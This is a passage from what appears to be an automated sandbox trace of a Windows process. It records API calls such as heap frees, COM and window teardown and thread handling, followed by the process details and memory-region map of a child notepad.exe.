1 [0082.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.372] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41af10 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445b10 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41af80 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41b0d0 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41b140 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.373] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x43b780 | out: hHeap=0x3f0000) returned 1 [0082.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x43b6b0 | out: hHeap=0x3f0000) returned 1 [0082.374] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41b060 | out: hHeap=0x3f0000) returned 1 [0082.506] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x43b620 | out: hHeap=0x3f0000) returned 1 [0082.507] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41aff0 | out: hHeap=0x3f0000) returned 1 [0082.507] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44ba70 | out: hHeap=0x3f0000) returned 1 [0082.507] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x445720 | out: hHeap=0x3f0000) returned 1 [0082.507] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44b260 | out: hHeap=0x3f0000) returned 1 [0082.508] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44aa50 | out: hHeap=0x3f0000) returned 1 [0082.508] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40ad00 | out: hHeap=0x3f0000) returned 1 [0082.508] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420a30 | out: hHeap=0x3f0000) returned 1 [0082.508] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ecc450 | out: hHeap=0x3f0000) returned 1 [0082.508] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e1c0 | out: hHeap=0x3f0000) returned 1 [0082.508] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.509] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e1f0 | out: hHeap=0x3f0000) returned 1 [0082.509] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x433c40 | out: hHeap=0x3f0000) returned 1 [0082.509] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x447100 | out: hHeap=0x3f0000) returned 1 [0082.509] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x447070 | out: hHeap=0x3f0000) returned 1 [0082.509] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2eb5570 | out: hHeap=0x3f0000) returned 1 [0082.510] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2eb5d70 | out: hHeap=0x3f0000) returned 1 [0082.510] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.510] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420950 | out: hHeap=0x3f0000) returned 1 [0082.510] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.510] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x420970 | out: hHeap=0x3f0000) returned 1 [0082.510] GetCurrentThreadId () returned 0xf14 [0082.510] DestroyWindow (hWnd=0x6030e) returned 1 [0082.510] NtdllDefWindowProc_W (hWnd=0x6030e, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0082.513] NtdllDefWindowProc_W (hWnd=0x6030e, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0082.513] NtdllDefWindowProc_W (hWnd=0x6030e, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0082.515] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.516] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x436a60 | out: hHeap=0x3f0000) returned 1 [0082.516] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4189c0 | out: hHeap=0x3f0000) returned 1 [0082.516] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.516] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.516] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.517] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x42e370 | out: hHeap=0x3f0000) returned 1 [0082.517] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.517] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4334b0 | out: hHeap=0x3f0000) returned 1 [0082.518] SetEvent (hEvent=0x1a0) returned 1 [0082.523] GetCurrentThreadId () returned 0xf14 [0082.523] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x1388) returned 0x0 [0082.524] GetExitCodeThread (in: hThread=0x9c, lpExitCode=0x30f450 | out: lpExitCode=0x30f450) returned 1 [0082.524] CloseHandle (hObject=0x1a0) returned 1 [0082.524] CloseHandle (hObject=0x9c) returned 1 [0082.524] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x459390 | out: hHeap=0x3f0000) returned 1 [0082.524] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x450890) returned 0x0 [0082.524] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0082.525] ReleaseActCtx (in: hActCtx=0x433cd8 | out: hActCtx=0x433cd8) [0082.525] GetProcAddress (hModule=0x7fefc070000, lpProcName="CloseThemeData") returned 0x7fefc078eac [0082.525] CloseThemeData () returned 0x0 [0082.525] FreeLibrary (hLibModule=0x7fef3310000) returned 1 [0082.525] FreeLibrary (hLibModule=0x7fef3310000) returned 1 [0082.539] UnregisterClassW (lpClassName=0xc178, hInstance=0x7feef840000) returned 1 [0082.539] UnregisterClassW (lpClassName=0xc171, hInstance=0x7feef840000) returned 1 [0082.539] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x435570 | out: hHeap=0x3f0000) returned 1 [0082.540] OleUninitialize () [0082.541] DestroyWindow (hWnd=0x60020) returned 1 [0082.542] PostQuitMessage (nExitCode=0) [0082.550] DllCanUnloadNow () returned 0x0 [0082.550] DllCanUnloadNow () returned 0x1 [0083.113] FreeLibrary (hLibModule=0x7feef840000) returned 1 [0083.114] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x7fef1e30000 [0083.114] GetProcAddress (hModule=0x7fef1e30000, lpProcName="CorExitProcess") returned 0x7fef1e47d20 [0083.117] CoGetContextToken (in: pToken=0x30f0b0 | out: pToken=0x30f0b0) returned 0x0 [0083.117] CObjectContext::QueryInterface () returned 0x0 [0083.118] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.118] Release () returned 0x0 [0083.120] CoGetContextToken (in: pToken=0x30ec80 | out: pToken=0x30ec80) returned 0x0 [0083.120] CObjectContext::QueryInterface () returned 0x0 [0083.121] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.121] Release () returned 0x0 [0083.121] CoGetContextToken (in: pToken=0x30ec80 | out: pToken=0x30ec80) returned 0x0 [0083.121] CObjectContext::QueryInterface () returned 0x0 [0083.122] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.122] Release () returned 0x0 [0083.131] CoGetContextToken (in: pToken=0x30ec80 | out: pToken=0x30ec80) returned 0x0 [0083.131] CObjectContext::QueryInterface () returned 0x0 [0083.131] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.131] Release () returned 0x0 [0083.133] CoGetContextToken (in: pToken=0x30ec70 | out: pToken=0x30ec70) returned 0x0 [0083.133] CObjectContext::QueryInterface () returned 0x0 [0083.133] CObjectContext::GetCurrentThreadType () returned 0x0 [0083.133] Release () returned 0x0 [0083.139] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x655b00 | out: hHeap=0x650000) returned 1 [0083.140] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x654ba0 | out: hHeap=0x650000) returned 1 [0083.180] free (_Block=0x2f50180) [0083.180] ??3@YAXPEAX@Z () returned 0x49361a01 [0083.180] ??3@YAXPEAX@Z () returned 0x49361a01 [0083.180] ??3@YAXPEAX@Z () returned 0x49361a01 [0083.180] ??3@YAXPEAX@Z () returned 0x49361a01 [0083.181] free (_Block=0x6876f0) [0083.184] GetCurrentThreadId () returned 0xf14 [0083.184] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4209d0 | out: hHeap=0x3f0000) returned 1 [0083.184] DeleteObject (ho=0x3c0a0b5c) returned 1 [0083.185] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45a920 | out: hHeap=0x3f0000) returned 1 [0083.185] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ec2020 | out: hHeap=0x3f0000) returned 1 [0083.185] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4477d0 | out: hHeap=0x3f0000) returned 1 [0083.186] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2edad10 | out: hHeap=0x3f0000) returned 1 [0083.187] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x2ee0260 | out: hHeap=0x3f0000) returned 1 [0083.188] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41bbc0 | out: hHeap=0x3f0000) returned 1 [0083.188] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d810 | out: hHeap=0x3f0000) returned 1 [0083.188] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44d840 | out: hHeap=0x3f0000) returned 1 [0083.188] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41b220 | out: hHeap=0x3f0000) returned 1 [0083.189] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.189] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.189] DeleteObject (ho=0x5f0801e8) returned 1 [0083.189] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418bf0 | out: hHeap=0x3f0000) returned 1 [0083.189] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x418b00 | out: hHeap=0x3f0000) returned 1 [0083.190] EtwEventUnregister (RegHandle=0x500010001) returned 0x0 [0083.190] EtwEventUnregister (RegHandle=0x600010001) returned 0x0 [0083.190] EtwEventUnregister (RegHandle=0x400010001) returned 0x0 [0083.190] EtwEventUnregister (RegHandle=0x700010001) returned 0x0 [0083.190] CloseHandle (hObject=0xa0) returned 1 [0083.190] UnmapViewOfFile (lpBaseAddress=0x1e0000) returned 1 [0083.192] CloseHandle (hObject=0xa4) returned 1 [0083.192] LocalFree (hMem=0x41a900) returned 0x0 [0083.192] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.192] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.193] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.193] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.193] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.193] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.193] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.193] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.193] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.194] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x423af0 | out: hHeap=0x3f0000) returned 1 [0083.194] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.194] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.194] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.194] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.194] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0083.194] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41a4f0 | out: hHeap=0x3f0000) returned 1 [0083.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4185b0 | out: hHeap=0x3f0000) returned 1 [0083.195] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41b9a0 | out: hHeap=0x3f0000) returned 1 [0083.195] FreeLibrary (hLibModule=0x7feff1e0000) returned 1 [0083.195] FreeLibrary (hLibModule=0x7fef32b0000) returned 1 [0083.196] free (_Block=0x686170) Thread: id = 2 os_tid = 0xf20 Thread: id = 3 os_tid = 0xf28 [0053.108] GetCurrentThreadId () returned 0xf28 [0053.113] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x7feef840000 [0053.113] CoInitialize (pvReserved=0x0) returned 0x0 [0053.114] WaitForSingleObject (hHandle=0x1a0, dwMilliseconds=0x927c0) returned 0x0 [0053.143] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1006) returned 0x45a250 [0053.144] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x459d40 | out: hHeap=0x3f0000) returned 1 [0053.144] IInternetProtocol:Read (in: This=0x458460, pv=0x45a318, cb=0xf38, pcbRead=0x267fdf0 | out: pv=0x45a318, pcbRead=0x267fdf0*=0xf38) returned 0x0 [0053.531] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x200a) returned 0x45cea0 [0053.532] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x45a250, cbMultiByte=4096, lpWideCharStr=0x45cea8, cchWideChar=4096 | out: lpWideCharStr="") returned 2684 [0053.575] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44e9f0 | out: hHeap=0x3f0000) returned 1 [0053.646] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa8) returned 0x451660 [0053.646] IUnknown:AddRef (This=0x42da90) returned 0xe [0053.646] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x2a0) returned 0x1e308a0 [0053.646] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x267fbf0 | out: lpCPInfo=0x267fbf0) returned 1 [0053.646] IUnknown:AddRef (This=0x43ead0) returned 0x4 [0053.646] IUnknown:AddRef (This=0x42da90) returned 0xf [0053.646] IUnknown:QueryInterface (in: This=0x42da90, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x267fc30 | out: ppvObject=0x267fc30*=0x42da90) returned 0x0 [0053.647] IUnknown:Release (This=0x42da90) returned 0xf [0053.647] IUnknown:AddRef (This=0x42da90) returned 0x10 [0053.647] IUri:GetScheme (in: This=0x42da90, pdwScheme=0x267fc60 | out: pdwScheme=0x267fc60*=0x9) returned 0x0 [0053.647] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x800a) returned 0x4c1d50 [0053.648] IUnknown:Release (This=0x42da90) returned 0xf [0053.648] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1006) returned 0x4c9d70 [0053.648] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x4000) returned 0x4cad80 [0053.649] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cad80 | out: hHeap=0x3f0000) returned 1 [0053.649] WaitForSingleObject (hHandle=0x1a0, dwMilliseconds=0x927c0) returned 0x0 [0070.031] WaitForSingleObject (hHandle=0x1a0, dwMilliseconds=0x927c0) returned 0x0 [0082.518] CoUninitialize () [0082.519] FreeLibraryAndExitThread (hLibModule=0x7feef840000, dwExitCode=0x0) [0082.521] GetCurrentThreadId () returned 0xf28 Thread: id = 4 os_tid = 0xf2c [0054.376] GetCurrentThreadId () returned 0xf2c Thread: id = 5 os_tid = 0xf30 [0054.411] GetCurrentThreadId () returned 0xf30 Thread: id = 6 os_tid = 0xf34 [0054.664] GetCurrentThreadId () returned 0xf34 Thread: id = 7 os_tid = 0xf40 [0061.126] GetCurrentThreadId () returned 0xf40 Thread: id = 8 os_tid = 0xf44 [0061.219] GetCurrentThreadId () returned 0xf44 [0062.580] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0083.129] UnmapViewOfFile (lpBaseAddress=0x2720000) returned 1 [0083.131] CloseHandle (hObject=0x2c8) returned 1 Process: id = "2" image_name = "notepad.exe" filename = "c:\\windows\\syswow64\\notepad.exe" page_root = "0x44d90000" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf10" cmd_line = "\"C:\\Windows\\SysWOW64\\notepad.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 427 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 428 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 429 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 430 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 431 start_va = 0x60000 end_va = 0x61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 432 start_va = 0x170000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 433 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 434 start_va = 0x4c0000 end_va = 0x4effff monitored = 0 entry_point = 0x4c3689 region_type = mapped_file name = "notepad.exe" filename = "\\Windows\\SysWOW64\\notepad.exe" (normalized: "c:\\windows\\syswow64\\notepad.exe") Region: id = 435 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 436 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 437 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 438 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 439 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 440 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 441 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 442 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 443 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 444 start_va = 0x70000 end_va = 0xa2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 445 start_va = 0x2b0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 446 start_va = 0x2f0000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 447 start_va = 0x3a0000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 448 start_va = 0x75330000 end_va = 0x7538bfff monitored = 0 entry_point = 0x7536f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 449 start_va = 0x75390000 end_va = 0x753cefff monitored = 0 entry_point = 0x753be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 450 start_va = 0x75400000 end_va = 0x75407fff monitored = 0 entry_point = 0x754020f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 451 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 452 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 453 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 454 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 455 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 456 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 457 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 458 start_va = 0x4f0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 459 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 460 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 461 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 462 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 463 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 464 start_va = 0xb0000 end_va = 0x116fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 465 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 466 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 467 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 468 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 469 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 470 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 471 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 472 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 473 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 474 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 475 start_va = 